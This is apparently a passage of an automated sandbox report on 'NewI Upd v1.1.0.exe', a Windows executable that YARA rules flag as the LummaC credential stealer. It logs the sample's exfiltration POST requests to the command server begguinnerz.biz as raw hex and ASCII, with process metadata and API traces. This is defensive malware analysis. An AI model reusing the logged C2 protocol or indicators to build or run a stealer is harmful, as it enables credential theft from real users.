e80os/bYuAbWnGY5aV1nGiJgCykT8EdFcxCVNPKLjbypXbqjMlw5300A8i89S7NPdaAdesZ2XwHgRBU3IN4fOGwKOSe0n/gDUpvx7v6J8sq2dwl71WXCUOQQgjTg2V+47ljo57JfrBADySPuOcvwHrYjiDvVYdIUs0TUJCEaT35pmngz+A94FtKe4OF9SzCPYDfeMRSjUZLgwUG3dJoMankKqyLzjP4E1h4luOhcp4l2Nd18hnZFwnCEAbL0ily
2024-12-27 02:03:13 UTC	1369	IN	Data Raw: 2b 42 33 47 47 79 52 51 6b 31 77 50 66 49 48 4f 6b 33 6d 38 73 37 34 32 65 2f 5a 45 32 53 44 30 6d 55 72 46 42 47 34 4c 42 30 72 71 6e 63 5a 61 4d 44 52 47 50 62 38 4b 35 69 37 54 43 47 77 7a 72 6a 47 63 38 46 51 38 4a 61 42 72 61 66 59 33 54 2f 73 43 62 4e 68 63 39 2b 72 30 52 4b 62 59 4f 38 74 6e 71 4d 4f 35 7a 65 4f 4f 74 65 7a 55 4a 64 68 55 49 49 30 35 77 75 4b 62 47 32 62 76 79 43 30 48 54 73 52 51 51 74 67 36 2b 34 4f 34 77 73 31 70 5a 6d 71 68 6d 54 42 52 2f 43 52 55 69 65 6b 32 31 2f 38 71 56 32 36 6f 7a 4a 63 4f 64 39 4e 41 62 4f 76 66 4d 73 79 77 53 6f 37 7a 2f 30 56 49 35 43 42 61 49 46 55 4a 43 73 55 45 62 67 73 48 53 75 71 64 78 6c 6f 77 4e 45 59 39 76 77 72 6d 4c 74 4d 49 62 44 4f 75 4d 62 6f 55 4a 52 67 55 49 49 30 35 59 75 4b 62 47 53 61 Data Ascii: +B3GGyRQk1wPfIHOk3m8s742e/ZE2SD0mUrFBG4LB0rqncZaMDRGPb8K5i7TCGwzrjGc8FQ8JaBrafY3T/sCbNhc9+r0RKbYO8tnqMO5zeOOtezUJdhUII05wuKbG2bvyC0HTsRQQtg6+4O4ws1pZmqhmTBR/CRUiek21/8qV26ozJcOd9NAbOvfMsywSo7z/0VI5CBaIFUJCsUEbgsHSuqdxlowNEY9vwrmLtMIbDOuMboUJRgUII05YuKbGSa

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49895	172.67.190.223	443	6648	C:\Users\user\Desktop\NewI Upd v1.1.0.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 02:03:15 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=KFE639LIZR1YG3YZ5JZ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18176 Host: begguinnerz.biz
2024-12-27 02:03:15 UTC	15331	OUT	Data Raw: 2d 2d 4b 46 45 36 33 39 4c 49 5a 52 31 59 47 33 59 5a 35 4a 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 39 30 32 31 33 31 39 30 44 32 32 32 38 33 36 39 44 39 32 33 46 39 31 33 46 38 41 41 36 46 37 0d 0a 2d 2d 4b 46 45 36 33 39 4c 49 5a 52 31 59 47 33 59 5a 35 4a 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4b 46 45 36 33 39 4c 49 5a 52 31 59 47 33 59 5a 35 4a 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 33 66 Data Ascii: --KFE639LIZR1YG3YZ5JZContent-Disposition: form-data; name="hwid"690213190D2228369D923F913F8AA6F7--KFE639LIZR1YG3YZ5JZContent-Disposition: form-data; name="pid"2--KFE639LIZR1YG3YZ5JZContent-Disposition: form-data; name="lid"HpOoIh--3f
2024-12-27 02:03:15 UTC	2845	OUT	Data Raw: 8e d2 6d b6 ae 65 d3 2c 95 40 cc 78 a8 6a 87 a7 66 35 eb c7 4a 53 81 68 2f 88 dd e0 cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af Data Ascii: me,@xjf5JSh/d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)
2024-12-27 02:03:16 UTC	1132	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 02:03:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=e281kuo4081bv5rpi3cslnh362; expires=Mon, 21 Apr 2025 19:49:54 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AuAj%2F9wd5k17KI%2FRUc6wcU80r1vaOLSpsFjcDTmWU4cizxSeCy7OVqm0PrHZzcidUrN7stFNn%2Fg8RmEFtAiOprFuOYyu0fAGSxYkDMxH23vBIawy%2BbWiw1Rewf81%2FV6romo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f85bbac3b94de96-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1480&min_rtt=1469&rtt_var=573&sent=14&recv=22&lost=0&retrans=0&sent_bytes=2839&recv_bytes=19138&delivery_rate=1872995&cwnd=224&unsent_bytes=0&cid=d1fd00d032099f90&ts=1019&x=0"
2024-12-27 02:03:16 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-27 02:03:16 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49902	172.67.190.223	443	6648	C:\Users\user\Desktop\NewI Upd v1.1.0.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 02:03:17 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=QUWCUNM037OXH2 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8767 Host: begguinnerz.biz
2024-12-27 02:03:17 UTC	8767	OUT	Data Raw: 2d 2d 51 55 57 43 55 4e 4d 30 33 37 4f 58 48 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 39 30 32 31 33 31 39 30 44 32 32 32 38 33 36 39 44 39 32 33 46 39 31 33 46 38 41 41 36 46 37 0d 0a 2d 2d 51 55 57 43 55 4e 4d 30 33 37 4f 58 48 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 51 55 57 43 55 4e 4d 30 33 37 4f 58 48 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 33 66 65 37 66 34 31 39 61 33 36 30 0d 0a 2d 2d 51 Data Ascii: --QUWCUNM037OXH2Content-Disposition: form-data; name="hwid"690213190D2228369D923F913F8AA6F7--QUWCUNM037OXH2Content-Disposition: form-data; name="pid"2--QUWCUNM037OXH2Content-Disposition: form-data; name="lid"HpOoIh--3fe7f419a360--Q
2024-12-27 02:03:18 UTC	1129	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 02:03:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=rfm2tmnjo1n5qbfjnjtk8rc4d7; expires=Mon, 21 Apr 2025 19:49:56 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lEBt%2Fzc4wNqQYcV5pXro6fUqwMcxdr%2BvEB7qgIEAea8LT5ELQ13ARS772uiIG2jCe73RHj0MbWgfTNK1r5DT4CKbpGKlQF%2ByXUhaXBW%2F1YdbOhwFjDMPpXls49r%2FGttVDYA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f85bbbade857c7e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3888&min_rtt=3287&rtt_var=1662&sent=7&recv=14&lost=0&retrans=0&sent_bytes=2840&recv_bytes=9701&delivery_rate=888348&cwnd=228&unsent_bytes=0&cid=3957bb8f4737c33e&ts=777&x=0"
2024-12-27 02:03:18 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-27 02:03:18 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49907	172.67.190.223	443	6648	C:\Users\user\Desktop\NewI Upd v1.1.0.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 02:03:19 UTC	279	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=6NPOTZ340UM1I91M User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20432 Host: begguinnerz.biz
2024-12-27 02:03:19 UTC	15331	OUT	Data Raw: 2d 2d 36 4e 50 4f 54 5a 33 34 30 55 4d 31 49 39 31 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 39 30 32 31 33 31 39 30 44 32 32 32 38 33 36 39 44 39 32 33 46 39 31 33 46 38 41 41 36 46 37 0d 0a 2d 2d 36 4e 50 4f 54 5a 33 34 30 55 4d 31 49 39 31 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 36 4e 50 4f 54 5a 33 34 30 55 4d 31 49 39 31 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 33 66 65 37 66 34 31 39 61 33 36 Data Ascii: --6NPOTZ340UM1I91MContent-Disposition: form-data; name="hwid"690213190D2228369D923F913F8AA6F7--6NPOTZ340UM1I91MContent-Disposition: form-data; name="pid"3--6NPOTZ340UM1I91MContent-Disposition: form-data; name="lid"HpOoIh--3fe7f419a36
2024-12-27 02:03:19 UTC	5101	OUT	Data Raw: 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 Data Ascii: `M?lrQMn 64F6(X&7~`aO
2024-12-27 02:03:20 UTC	1129	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 02:03:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=831gs51r4ab98n6qcvv2t2rth8; expires=Mon, 21 Apr 2025 19:49:59 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hvsu4ApRg%2FMa0raetTgMS0COEV5OyK5AZ8b7KDSK0kxbxK%2BVmWTYL0ujgFDbkXVANZZpav6men6JQ2kGViSoAQArFKqLXFgxLbzvwPiTmM421v%2FlB9s6%2FZSFt7fP7f7N958%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f85bbc89de24385-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1810&min_rtt=1807&rtt_var=684&sent=11&recv=26&lost=0&retrans=0&sent_bytes=2839&recv_bytes=21391&delivery_rate=1593886&cwnd=250&unsent_bytes=0&cid=553d7b6d2e124f44&ts=977&x=0"
2024-12-27 02:03:20 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-27 02:03:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49914	172.67.190.223	443	6648	C:\Users\user\Desktop\NewI Upd v1.1.0.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 02:03:22 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=0VJUNPD5A8U7ORRNJ62 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1266 Host: begguinnerz.biz
2024-12-27 02:03:22 UTC	1266	OUT	Data Raw: 2d 2d 30 56 4a 55 4e 50 44 35 41 38 55 37 4f 52 52 4e 4a 36 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 39 30 32 31 33 31 39 30 44 32 32 32 38 33 36 39 44 39 32 33 46 39 31 33 46 38 41 41 36 46 37 0d 0a 2d 2d 30 56 4a 55 4e 50 44 35 41 38 55 37 4f 52 52 4e 4a 36 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 30 56 4a 55 4e 50 44 35 41 38 55 37 4f 52 52 4e 4a 36 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 33 66 Data Ascii: --0VJUNPD5A8U7ORRNJ62Content-Disposition: form-data; name="hwid"690213190D2228369D923F913F8AA6F7--0VJUNPD5A8U7ORRNJ62Content-Disposition: form-data; name="pid"1--0VJUNPD5A8U7ORRNJ62Content-Disposition: form-data; name="lid"HpOoIh--3f
2024-12-27 02:03:23 UTC	1128	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 02:03:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=5bqi7kgfo2fgik7m4f4v9gdvbd; expires=Mon, 21 Apr 2025 19:50:01 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B1EZ8AJ6fhbiBcP7T4y3E3LKq7XSXyL7E2vFkdg8kK5kNZkHhme%2FiqTP0BBIGVUz9StpI4t%2BiDAGmFx2hA%2BPHWOv5CbkJkx2J0b8FXmaKK8dhmAdV1Wkc9ftLoDw6%2Bn%2Fxfo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f85bbd9edd2c407-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1502&min_rtt=1499&rtt_var=569&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2839&recv_bytes=2183&delivery_rate=1913499&cwnd=197&unsent_bytes=0&cid=913048d752394160&ts=738&x=0"
2024-12-27 02:03:23 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-27 02:03:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49920	172.67.190.223	443	6648	C:\Users\user\Desktop\NewI Upd v1.1.0.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 02:03:24 UTC	273	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SXIRRLO7FAI User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1077 Host: begguinnerz.biz
2024-12-27 02:03:24 UTC	1077	OUT	Data Raw: 2d 2d 53 58 49 52 52 4c 4f 37 46 41 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 39 30 32 31 33 31 39 30 44 32 32 32 38 33 36 39 44 39 32 33 46 39 31 33 46 38 41 41 36 46 37 0d 0a 2d 2d 53 58 49 52 52 4c 4f 37 46 41 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 53 58 49 52 52 4c 4f 37 46 41 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 33 66 65 37 66 34 31 39 61 33 36 30 0d 0a 2d 2d 53 58 49 52 52 4c 4f 37 46 41 Data Ascii: --SXIRRLO7FAIContent-Disposition: form-data; name="hwid"690213190D2228369D923F913F8AA6F7--SXIRRLO7FAIContent-Disposition: form-data; name="pid"1--SXIRRLO7FAIContent-Disposition: form-data; name="lid"HpOoIh--3fe7f419a360--SXIRRLO7FA
2024-12-27 02:03:25 UTC	1126	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 02:03:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=371o5manjmqev886qoio2q8oru; expires=Mon, 21 Apr 2025 19:50:03 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aHjmkEN7KBcklLGbv4z0QH6gRczm%2FO58TxIVL8EOH0YRcbefxOwLuE76a4aie%2BRPaoP5bfpxKlXBynt3kmMAxwBsUVPF%2Bkm62OElIZI0xSmzbqxsIGrStK5L2fBHfSrkiFs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f85bbe709361a34-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=7126&min_rtt=1856&rtt_var=4004&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2840&recv_bytes=1986&delivery_rate=1573275&cwnd=185&unsent_bytes=0&cid=212acd6c02c64484&ts=1427&x=0"
2024-12-27 02:03:25 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-27 02:03:25 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49926	172.67.190.223	443	6648	C:\Users\user\Desktop\NewI Upd v1.1.0.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 02:03:27 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 121 Host: begguinnerz.biz
2024-12-27 02:03:27 UTC	121	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 33 66 65 37 66 34 31 39 61 33 36 30 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61 26 68 77 69 64 3d 36 39 30 32 31 33 31 39 30 44 32 32 32 38 33 36 39 44 39 32 33 46 39 31 33 46 38 41 41 36 46 37 Data Ascii: act=get_message&ver=4.0&lid=HpOoIh--3fe7f419a360&j=b9abc76ce53b6fc3a03566f8f764f5ea&hwid=690213190D2228369D923F913F8AA6F7
2024-12-27 02:03:27 UTC	1130	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 02:03:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=lqd4irhah02iesssddmoei8fj0; expires=Mon, 21 Apr 2025 19:50:06 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lfFs1bTS1CyVWgEDkF4M4CJkNay987edtXhl1oe%2BsG5aCmomFIQd8KfbSR2jiM1msGvEoIdChy%2BAY3%2FEioaYeztGMplnO709g17Kopj%2FsriZeMA2dRGS%2Bk3CVzbAt%2BqaEmc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f85bbf8a86e434f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1744&min_rtt=1738&rtt_var=665&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1021&delivery_rate=1629464&cwnd=209&unsent_bytes=0&cid=b610dc698d2f42dd&ts=759&x=0"
2024-12-27 02:03:27 UTC	54	IN	Data Raw: 33 30 0d 0a 71 43 69 42 69 72 37 49 4f 53 33 4a 6c 63 75 30 53 36 6c 6e 2b 76 4e 79 54 64 41 53 77 38 4e 37 35 55 79 35 49 6c 7a 73 2f 76 58 7a 64 51 3d 3d 0d 0a Data Ascii: 30qCiBir7IOS3Jlcu0S6ln+vNyTdASw8N75Uy5Ilzs/vXzdQ==
2024-12-27 02:03:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	21:00:55
Start date:	26/12/2024
Path:	C:\Users\user\Desktop\NewI Upd v1.1.0.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\NewI Upd v1.1.0.exe"
Imagebase:	0x630000
File size:	2'757'632 bytes
MD5 hash:	F186A87680772F195F865CEDAB080B6D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.3109623142.000000000196B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.3179555778.00000000017B0000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	4.3%
Dynamic/Decrypted Code Coverage:	84%
Signature Coverage:	53%
Total number of Nodes:	406
Total number of Limit Nodes:	16

Executed Functions

Function 004388C0 Relevance: 39.1, APIs: 11, Strings: 11, Instructions: 609
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(0044268C,00000000,00000001,0044267C,00000000), ref: 00438AA6
SysAllocString.OLEAUT32(b1}3), ref: 00438B3A
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00438B7C
SysAllocString.OLEAUT32(85D58BE5), ref: 00438C09
SysAllocString.OLEAUT32(85D58BE5), ref: 00438C97
VariantInit.OLEAUT32(F7F6F5CC), ref: 00438D07
GetVolumeInformationW.KERNELBASE(?,00000000,00000000,3C903E9C,00000000,00000000,00000000,00000000), ref: 00438ED6

Strings

de, xrefs: 00438C71
u%w, xrefs: 00438C51
rs, xrefs: 00438D41
:, xrefs: 00438A59
u=s?, xrefs: 00438ACC
\]^_, xrefs: 00438F97
b1}3, xrefs: 00438B35, 00438B39
d9y;, xrefs: 00438AC4
\, xrefs: 00438A60
B,kz, xrefs: 00438F70
dE, xrefs: 00438C31

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
